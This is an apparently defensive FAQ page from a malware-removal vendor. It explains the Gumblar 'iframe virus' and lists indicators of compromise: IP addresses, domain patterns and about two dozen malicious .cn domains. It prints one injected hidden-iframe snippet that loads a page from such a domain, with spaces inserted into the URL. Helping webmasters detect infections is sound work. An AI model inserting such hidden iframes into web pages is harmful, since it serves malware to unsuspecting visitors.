buy malware removal aid kit
Webmasters call it iframe virus? Why?

Badware like gumblar and other variants work by injecting malicious code into your website - be it HTML or PHP or ASP.
If you see the source of HTML, you will find some code like this:
 <iframe src="http: //coolnameshop .cn/ in.cgi?income23" width=1 height=1 style="visibility: hidden"></iframe>
There are typical hidden iframe tags injected at the bottom of webpages. The domain names may vary but they typically end with .cn, .ru, ro, etc. The domain names usually contain words shop, cool, lot, bet, etc.. Most of these domain names point to IP addresses like 94 .247 .3 .151, 94 .247 .3 .150, etc. The iframes load pages with paths similar to  “in.cgi?incomeNN”, where NN is some arbitrary number. In recent times, we have found iframe code with domain patterns like 3b4 .ru/, q3e .in/, x3y .ru/, using port 8080 .
Here is a list of domains used that we observed in the code:

  • coolnameshop .cn
  • jl.chura. pl
  • lotultimatebet .cn
  • lotmachinesguide .cn
  • cheapslotplay .cn
  • lotultimatebet .cn
  • cutlot .cn
  • mediahousenameshopfilm .cn
  • betbigwager .cn
  • namebuypicture .cn
  • thelotbet .cn 
  • hotslotpot .cn
  • mixante .cn
  • lotante .cn 
  • superbetfair .cn
  • litecartop .cn 
  • betworldwager .cn
  • litecarfinestsite .cn
  • homenameregistration .cn
  • litegreatestdirect .cn 
  • playbetwager .cn 
  • nameashop .cn 
  • mainnameshop .cn
  • superlitecarbest .cn
  • internetnamestore .cn
  • dotcomnameshop .cn 
  • mediahomenamemartvideo .cn


Browse all iframe virus FAQ